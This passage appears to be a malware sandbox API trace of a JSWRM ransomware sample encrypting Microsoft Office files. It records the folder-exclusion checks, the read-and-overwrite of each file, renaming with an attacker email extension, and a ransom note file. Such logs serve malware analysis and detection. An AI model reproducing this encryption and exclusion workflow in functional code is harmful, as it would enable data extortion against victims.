cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKREQS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKREQS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKREQS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskreqs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.478] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.478] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.478] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.479] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.479] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.479] CloseHandle (hObject=0x314) returned 1 [0130.480] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKREQS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskreqs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKREQS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskreqs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.480] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4d4679, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKS.ICO", cAlternateFileName="")) returned 1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2=".") returned 1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2="..") returned 1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2="...") returned 1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2="windows") returned -1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2="recovery") returned 1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2="perflogs") returned 1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2="documents and settings") returned 1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2="system volume information") returned 1 [0130.481] lstrcmpiW (lpString1="TASKS.ICO", lpString2="msocache") returned 1 [0130.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKS.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKS.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKS.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKS.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKS.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKS.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\tasks.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.482] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.482] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.482] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.483] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.483] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.484] CloseHandle (hObject=0x314) returned 1 [0130.484] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\tasks.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\tasks.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.484] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4d4679, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4d4679, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4d4679, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKUPD.CFG", cAlternateFileName="")) returned 1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2=".") returned 1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2="..") returned 1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2="...") returned 1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2="windows") returned -1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2="recovery") returned 1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2="perflogs") returned 1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2="documents and settings") returned 1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2="system volume information") returned 1 [0130.485] lstrcmpiW (lpString1="TASKUPD.CFG", lpString2="msocache") returned 1 [0130.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKUPD.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKUPD.CFG", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKUPD.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKUPD.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKUPD.CFG", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKUPD.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKUPD.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskupd.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.486] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=806) returned 1 [0130.486] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.486] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x320, lpOverlapped=0x0) returned 1 [0130.498] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.498] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x320, lpOverlapped=0x0) returned 1 [0130.499] CloseHandle (hObject=0x314) returned 1 [0130.499] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKUPD.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskupd.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKUPD.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskupd.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.500] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4d4679, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4d4679, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4d4679, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKUPD.CFG", cAlternateFileName="")) returned 0 [0130.500] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0130.500] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43fb24b7, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43fb24b7, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43fb24b7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.500] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.500] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.500] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.509] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.509] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.509] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.509] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.509] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.509] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.509] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.509] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43fb24b7, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43fb24b7, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43fb24b7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0130.509] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0130.509] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4dd9107, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15f450, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="GANTT.DLL", cAlternateFileName="")) returned 1 [0130.509] lstrcmpiW (lpString1="GANTT.DLL", lpString2=".") returned 1 [0130.509] lstrcmpiW (lpString1="GANTT.DLL", lpString2="..") returned 1 [0130.509] lstrcmpiW (lpString1="GANTT.DLL", lpString2="...") returned 1 [0130.509] lstrcmpiW (lpString1="GANTT.DLL", lpString2="windows") returned -1 [0130.509] lstrcmpiW (lpString1="GANTT.DLL", lpString2="recovery") returned -1 [0130.510] lstrcmpiW (lpString1="GANTT.DLL", lpString2="perflogs") returned -1 [0130.510] lstrcmpiW (lpString1="GANTT.DLL", lpString2="documents and settings") returned 1 [0130.510] lstrcmpiW (lpString1="GANTT.DLL", lpString2="$RECYCLE.BIN") returned 1 [0130.510] lstrcmpiW (lpString1="GANTT.DLL", lpString2="system volume information") returned -1 [0130.510] lstrcmpiW (lpString1="GANTT.DLL", lpString2="msocache") returned -1 [0130.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.DLL", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GANTT.DLL", lpUsedDefaultChar=0x0) returned 9 [0130.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.DLL", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GANTT.DLL", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GANTT.DLL", lpUsedDefaultChar=0x0) returned 9 [0130.510] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x18b202d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x701c60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="GKExcel.dll", cAlternateFileName="")) returned 1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2=".") returned 1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2="..") returned 1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2="...") returned 1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2="windows") returned -1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2="recovery") returned -1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2="perflogs") returned -1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2="documents and settings") returned 1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2="$RECYCLE.BIN") returned 1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2="system volume information") returned -1 [0130.510] lstrcmpiW (lpString1="GKExcel.dll", lpString2="msocache") returned -1 [0130.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKExcel.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKExcel.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GKExcel.dll", lpUsedDefaultChar=0x0) returned 11 [0130.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKExcel.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKExcel.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GKExcel.dll", lpUsedDefaultChar=0x0) returned 11 [0130.510] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x17ff3259, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x485ec0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="GKPowerPoint.dll", cAlternateFileName="GKPOWE~1.DLL")) returned 1 [0130.510] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2=".") returned 1 [0130.510] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2="..") returned 1 [0130.510] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2="...") returned 1 [0130.510] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2="windows") returned -1 [0130.510] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2="recovery") returned -1 [0130.510] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2="perflogs") returned -1 [0130.511] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2="documents and settings") returned 1 [0130.511] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2="$RECYCLE.BIN") returned 1 [0130.511] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2="system volume information") returned -1 [0130.511] lstrcmpiW (lpString1="GKPowerPoint.dll", lpString2="msocache") returned -1 [0130.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKPowerPoint.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0130.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKPowerPoint.dll", cchWideChar=16, lpMultiByteStr=0x241128, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GKPowerPoint.dll", lpUsedDefaultChar=0x0) returned 16 [0130.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKPowerPoint.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0130.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKPowerPoint.dll", cchWideChar=16, lpMultiByteStr=0x2412b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GKPowerPoint.dll", lpUsedDefaultChar=0x0) returned 16 [0130.511] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x18afa0b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x528860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="GKWord.dll", cAlternateFileName="")) returned 1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2=".") returned 1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2="..") returned 1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2="...") returned 1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2="windows") returned -1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2="recovery") returned -1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2="perflogs") returned -1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2="documents and settings") returned 1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2="$RECYCLE.BIN") returned 1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2="system volume information") returned -1 [0130.511] lstrcmpiW (lpString1="GKWord.dll", lpString2="msocache") returned -1 [0130.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKWord.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0130.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GKWord.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GKWord.dll", lpUsedDefaultChar=0x0) returned 10 [0130.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 